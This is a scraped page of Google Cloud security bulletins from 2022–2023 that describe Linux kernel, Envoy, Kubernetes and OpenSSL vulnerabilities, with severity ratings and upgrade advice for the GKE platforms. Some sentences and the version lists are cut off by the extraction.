A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE. What should I do?No action is required. |
None |
GCP-2023-017
Published: 2023-06-26
Updated: 2023-07-11
Reference: CVE-2023-31436
2023-07-11 Update: New GKE versions have been updated to include the latest Ubuntu versions that patch CVE-2023-31436.
GKE
Updated: 2023-07-11
Description | Severity |
---|---|
A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE clusters, including Autopilot clusters, are affected. GKE clusters using GKE Sandbox are not affected. What should I do?2023-07-11 Update: Ubuntu patch versions are available. The following GKE versions have been updated to include the latest Ubuntu versions that patch CVE-2023-31436:
The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are being addressed?With CVE-2023-31436, an out-of-bounds memory access flaw was found in the Linux kernel's traffic control (QoS) subsystem in how a user triggers the qfq_change_class function with an incorrect MTU value of the network device used as lmax. This flaw allows a local user to crash or potentially escalate their privileges on the system. |
High |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on VMware clusters are affected. What should I do?What vulnerabilities are being addressed?With CVE-2023-31436, an out-of-bounds memory access flaw was found in the Linux kernel's traffic control (QoS) subsystem in how a user triggers the qfq_change_class function with an incorrect MTU value of the network device used as lmax. This flaw allows a local user to crash or potentially escalate their privileges on the system. |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on AWS clusters are affected. What should I do?What vulnerabilities are addressed by this patch?With CVE-2023-31436, an out-of-bounds memory access flaw was found in the Linux kernel's traffic control (QoS) subsystem in how a user triggers the qfq_change_class function with an incorrect MTU value of the network device used as lmax. This flaw allows a local user to crash or potentially escalate their privileges on the system. |
High |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on Azure clusters are affected. What should I do?What vulnerabilities are addressed by this patch?With CVE-2023-31436, an out-of-bounds memory access flaw was found in the Linux kernel's traffic control (QoS) subsystem in how a user triggers the qfq_change_class function with an incorrect MTU value of the network device used as lmax. This flaw allows a local user to crash or potentially escalate their privileges on the system. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE. What should I do?No action is required. |
None |
GCP-2023-016
Published: 2023-06-26
Reference:
CVE-2023-27496,
CVE-2023-27488,
CVE-2023-27493,
CVE-2023-27492,
CVE-2023-27491,
CVE-2023-27487
GKE
Description | Severity |
---|---|
A number of vulnerabilities have been discovered in Envoy, which is used in Cloud Service Mesh (ASM). These were reported separately as GCP-2023-002. GKE does not ship with ASM and is not affected by these vulnerabilities. What should I do?If you have separately installed ASM for your GKE clusters, please see GCP-2023-002. |
None |
GKE on VMware
Description | Severity |
---|---|
A number of vulnerabilities (CVE-2023-27496, CVE-2023-27488, CVE-2023-27493, CVE-2023-27492, CVE-2023-27491, CVE-2023-27487), have been discovered in Envoy, which is used in Cloud Service Mesh in GKE on VMware, that allows a malicious attacker to cause a denial of service or crash Envoy. These were reported separately as GCP-2023-002, but we want to ensure that GKE Enterprise customers update their versions that include ASM. What should I do?The following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch?CVE-2023-27496: If Envoy is running with the OAuth filter enabled exposed, a malicious actor could construct a request which would cause denial of service by crashing Envoy. CVE-2023-27488: Attackers can use this vulnerability to bypass auth checks when ext_authz is used. CVE-2023-27493: Envoy configuration must also include an option to add request headers that were generated using inputs from the request, such as the peer certificate SAN. CVE-2023-27492: Attackers can send large request bodies for routes that have Lua filter enabled and trigger crashes. CVE-2023-27491: Attackers can send specifically crafted HTTP/2 or HTTP/3 requests to trigger parsing errors on HTTP/1 upstream service.
CVE-2023-27487: The header |
High |
GKE on AWS
Description | Severity |
---|---|
A number of vulnerabilities (CVE-2023-27496, CVE-2023-27488, CVE-2023-27493, CVE-2023-27492, CVE-2023-27491, CVE-2023-27487), have been discovered in Envoy, which is used in Cloud Service Mesh. These were reported separately as GCP-2023-002. GKE on AWS does not ship with ASM and is not affected. What should I do?No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A number of vulnerabilities (CVE-2023-27496, CVE-2023-27488, CVE-2023-27493, CVE-2023-27492, CVE-2023-27491, CVE-2023-27487), have been discovered in Envoy, which is used in Cloud Service Mesh. These were reported separately as GCP-2023-002. GKE on Azure does not ship with ASM and is not affected. What should I do?No action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A number of vulnerabilities (CVE-2023-27496, CVE-2023-27488, CVE-2023-27493, CVE-2023-27492, CVE-2023-27491, CVE-2023-27487), have been discovered in Envoy, which is used in Cloud Service Mesh in GKE on Bare Metal, that allows a malicious attacker to cause a denial of service or crash Envoy. These were reported separately as GCP-2023-002, but we want to ensure that GKE Enterprise customers update their versions that include ASM. What should I do?The following versions of GKE on Bare Metal have been updated with code to fix this vulnerability. We recommend that you upgrade your admin and user clusters to one of the following GKE on Bare Metal versions:
What vulnerabilities are addressed by this patch?CVE-2023-27496: If Envoy is running with the OAuth filter enabled exposed, a malicious actor could construct a request which would cause denial of service by crashing Envoy. CVE-2023-27488: Attackers can use this vulnerability to bypass auth checks when ext_authz is used. CVE-2023-27493: Envoy configuration must also include an option to add request headers that were generated using inputs from the request, such as the peer certificate SAN. CVE-2023-27492: Attackers can send large request bodies for routes that have Lua filter enabled and trigger crashes. CVE-2023-27491: Attackers can send specifically crafted HTTP/2 or HTTP/3 requests to trigger parsing errors on HTTP/1 upstream service.
CVE-2023-27487: The header |
High |
GCP-2023-015
Published: 2023-06-20
Reference: CVE-2023-0468
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. GKE clusters, including Autopilot clusters, are affected. GKE clusters using GKE Sandbox are not affected. What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are being addressed?In CVE-2023-0468, a use-after-free flaw was found in io_uring/poll.c in io_poll_check_events in the io_uring subcomponent in the Linux Kernel. This flaw may cause a NULL pointer dereference, and potentially a system crash leading to a denial of service. |
Medium |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. GKE on VMware uses version 5.4 of the Linux Kernel and is not affected by this CVE. What should I do?
|
None |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. GKE on AWS is not affected by this CVE. What should I do?
|
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. GKE on Azure is not affected by this CVE. What should I do?
|
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE. What should I do?
|
None |
GCP-2023-014
Published: 2023-06-15
Updated: 2023-08-11
Reference: CVE-2023-2727, CVE-2023-2728
2023-08-11 Update: Added patch versions for GKE on VMware, GKE on AWS, GKE on Azure, and GKE on Bare Metal
GKE
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728). GKE does not use ImagePolicyWebhook and is not affected by CVE-2023-2727. All versions of GKE are potentially vulnerable to CVE-2023-2728.What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
GKE on VMware
Updated: 2023-08-11
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728) Anthos on VMware does not use ImagePolicyWebhook and is not affected by CVE-2023-2727. All versions of Anthos on VMware are potentially vulnerable to CVE-2023-2728. What should I do?2023-08-11 Update: The following versions of GKE on VMware have been updated with code to fix this vulnerability. Upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
GKE on AWS
Updated: 2023-08-11
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728) What should I do?2023-08-11 Update: The following version of GKE on AWS has been updated with code to fix this vulnerability. Upgrade your nodes to the following GKE on AWS version:
What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
GKE on Azure
Updated: 2023-08-11
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728) What should I do?2023-08-11 Update: The following version of GKE on Azure has been updated with code to fix this vulnerability. Upgrade your nodes to the following GKE on Azure version:
What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
GKE on Bare Metal
Updated: 2023-08-11
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728) What should I do?2023-08-11 Update: The following versions of Google Distributed Cloud Virtual for Bare Metal have been updated with code to fix this vulnerability. Upgrade your nodes to one of the following Google Distributed Cloud Virtual for Bare Metal versions:
What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
GCP-2023-009
Published: 2023-06-06
Reference: CVE-2023-2878
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE is not affected by this CVE. What should I do?While GKE is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE on VMware is not affected by this CVE. What should I do?While GKE on VMware is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE on AWS is not affected by this CVE. What should I do?While GKE on AWS is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE on Azure is not affected by this CVE What should I do?While GKE on Azure is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE on Bare Metal is not affected by this CVE. What should I do?While GKE on Bare Metal is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GCP-2023-008
Published: 2023-06-05
Reference: CVE-2023-1872
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. GKE Standard and Autopilot clusters are affected. Clusters using GKE Sandbox are not affected. What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are addressed by this patch?CVE-2023-1872 is a use-after-free vulnerability in the io_uring subsystem of the Linux kernel that can be exploited to achieve local privilege escalation. The |
High |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. What should I do?What vulnerabilities are addressed by this patch?CVE-2023-1872 is a use-after-free vulnerability in the io_uring subsystem of the Linux kernel that can be exploited to achieve local privilege escalation. The |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. What should I do?The following versions of GKE on AWS have been updated with code to fix these vulnerabilities: What vulnerabilities are addressed by this patch?CVE-2023-1872 is a use-after-free vulnerability in the io_uring subsystem of the Linux kernel that can be exploited to achieve local privilege escalation. The |
High |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. What should I do?The following versions of GKE on Azure have been updated with code to fix these vulnerabilities: What vulnerabilities are addressed by this patch?CVE-2023-1872 is a use-after-free vulnerability in the io_uring subsystem of the Linux kernel that can be exploited to achieve local privilege escalation. The |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. GKE on Bare Metal is not affected by this CVE. What should I do?No action required. |
None |
GCP-2023-005
Published: 2023-05-18
Updated: 2023-06-06
Reference: CVE-2023-1281, CVE-2023-1829
2023-06-06 Update: New GKE versions have been updated to include the latest Ubuntu versions that patch CVE-2023-1281 and CVE-2023-1829.
GKE
Updated: 2023-06-06
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. GKE Standard clusters are affected. GKE Autopilot clusters and clusters using GKE Sandbox are not affected. What should I do?2023-06-06 Update: Ubuntu patch versions are available. The following GKE versions have been updated to include the latest Ubuntu versions that patch CVE-2023-1281 and CVE-2023-1829:
The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are addressed by this patch?Both CVE-2023-1281 and CVE-2023-1829 are use-after-free vulnerabilities in the Linux Kernel traffic control index filter (tcindex) that can be exploited to achieve local privilege escalation. With CVE-2023-1829, the tcindex_delete function does not properly deactivate filters in certain cases which can later lead to double freeing of a data structure. In CVE-2023-1281, the imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when |
High |
GKE on VMware
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. What should I do?What vulnerabilities are addressed by this patch?Both CVE-2023-1281 and CVE-2023-1829 are use-after-free vulnerabilities in the Linux Kernel traffic traffic control index filter (tcindex) that can be exploited to achieve local privilege escalation. With CVE-2023-1829, the tcindex_delete function does not properly deactivate filters in certain cases which can later lead to double freeing of a data structure. In CVE-2023-1281, the imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when |
High |
GKE on AWS
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. What should I do?What vulnerabilities are addressed by this patch?Both CVE-2023-1281 and CVE-2023-1829 are use-after-free vulnerabilities in the Linux Kernel traffic traffic control index filter (tcindex) that can be exploited to achieve local privilege escalation. With CVE-2023-1829, the tcindex_delete function does not properly deactivate filters in certain cases which can later lead to double freeing of a data structure. In CVE-2023-1281, the imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when |
High |
GKE on Azure
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. What should I do?What vulnerabilities are addressed by this patch?Both CVE-2023-1281 and CVE-2023-1829 are use-after-free vulnerabilities in the Linux Kernel traffic traffic control index filter (tcindex) that can be exploited to achieve local privilege escalation. With CVE-2023-1829, the tcindex_delete function does not properly deactivate filters in certain cases which can later lead to double freeing of a data structure. In CVE-2023-1281, the imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when |
High |
GKE on Bare Metal
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. GKE on Bare Metal are not affected by this CVE. What should I do?No action required. |
None |
GCP-2023-003
Published: 2023-04-11
Updated: 2023-12-21
Reference: CVE-2023-0240,
CVE-2023-23586
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Updated: 2023-12-21
Description | Severity |
---|---|
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE clusters, including Autopilot clusters, with COS using Linux Kernel version 5.10 until 5.10.162 are affected. GKE clusters using Ubuntu images or using GKE Sandbox are unaffected. What should I do?The following versions of GKE have been updated with code to fix these vulnerabilities. For security purposes, even if you have node-autoupgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are addressed by this patch?Vulnerability 1 (CVE-2023-0240): A race condition in Vulnerability 2 (CVE-2023-23586): A use after free (UAF) in |
High |
GKE on VMware
Description | Severity |
---|---|
Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE on VMware clusters with COS using Linux Kernel version 5.10 until 5.10.162 are affected. GKE Enterprise clusters using Ubuntu images are unaffected. What should I do?The following versions of GKE on VMware have been updated with code to fix these vulnerabilities:
What vulnerabilities are addressed by this patch?Vulnerability 1 (CVE-2023-0240): A race condition in Vulnerability 2 (CVE-2023-23586): A use after free (UAF) in |
High |
GKE on AWS
Description | Severity |
---|---|
Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE on AWS is not affected by these CVEs. What should I do?No action required. |
None |
GKE on Azure
Description | Severity |
---|---|
Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE on Azure is not affected by these CVEs What should I do?No action required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE on Bare Metal is not affected by these CVEs. What should I do?No action required. |
None |
GCP-2023-001
Published: 2023-03-01
Updated: 2023-12-21
Reference: CVE-2022-4696
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Description | Severity |
---|---|
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE clusters, including Autopilot clusters, are impacted. GKE clusters using GKE Sandbox are not affected. What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your clusters and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are addressed by this patch?With CVE-2022-4696, a use-after-free flaw was found in io_uring and ioring_op_splice in the Linux kernel. This flaw allows a local user to create a local privilege escalation. |
High |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on VMware running v1.12 and v1.13 are impacted. GKE on VMware running v1.14 or later are not affected. What should I do?The following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch?With CVE-2022-4696, a use-after-free flaw was found in io_uring and ioring_op_splice in the Linux kernel. This flaw allows a local user to create a local privilege escalation. |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on AWS is unaffected by this vulnerability. What should I do?No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on Azure is unaffected by this vulnerability. What should I do?No action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on Bare Metal is unaffected by this vulnerability. What should I do?No action is required. |
None |
GCP-2022-026
Published: 2023-01-11
Reference: CVE-2022-3786, CVE-2022-3602
GKE
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL v3.0.6 that can potentially cause a crash. While this has been rated a High in the NVD database, GKE endpoints use boringSSL or an older version of OpenSSL that is not affected, so the rating has been reduced to a Medium for GKE. What should I do?The following versions of GKE have been updated with code to fix this vulnerability:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are addressed by this patch?With CVE-2022-3786 and CVE-2022-3602, a buffer overrun can be triggered in X.509 certificate verification that can cause a crash that will result in a denial of service. To be exploited, this vulnerability requires either a CA to have signed a malicious certificate or for an application to continue certificate verification despite failure to construct a path to a trusted issuer. |
Medium |
GKE on VMware
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL v3.0.6 that can potentially cause a crash. What should I do?GKE on VMware is not affected by this CVE as it does not use an impacted version of OpenSSL. What vulnerabilities are addressed by this patch?No action required. |
None |
GKE on AWS
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL v3.0.6 that can potentially cause a crash. What should I do?GKE on AWS is not affected by this CVE as it does not use an impacted version of OpenSSL. What vulnerabilities are addressed by this patch?No action required. |
None |
GKE on Azure
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL v3.0.6 that can potentially cause a crash. What should I do?GKE on Azure is not affected by this CVE as it does not use an impacted version of OpenSSL. What vulnerabilities are addressed by this patch?No action required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL v3.0.6 that can potentially cause a crash. What should I do?GKE on Bare Metal is not affected by this CVE as it does not use an impacted version of OpenSSL. What vulnerabilities are addressed by this patch?No action required. |
None |
GCP-2022-025
Published: 2022-12-21
Updated: 2023-01-19, 2023-12-21
Reference: CVE-2022-2602
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-01-19 Update: GKE version 1.21.14-gke.14100 is available.
GKE
Updated: 2023-01-19
Description | Severity |
---|---|
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code. GKE clusters, including Autopilot clusters, are impacted. GKE clusters using GKE Sandbox are not affected. What should I do?2023-01-19 Update: Version 1.21.14-gke.14100 is available. Upgrade your node pools to this version or later. The following versions of GKE have been updated with code to fix this vulnerability in an upcoming release. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are addressed by this patch?With CVE-2022-2602, a race condition between io_uring request processing and Unix socket garbage collection can cause a use-after-free vulnerability. A local attacker could use this to trigger a denial of service or possibly execute arbitrary code. |
High |
GKE on VMware
Description | Severity |
---|---|
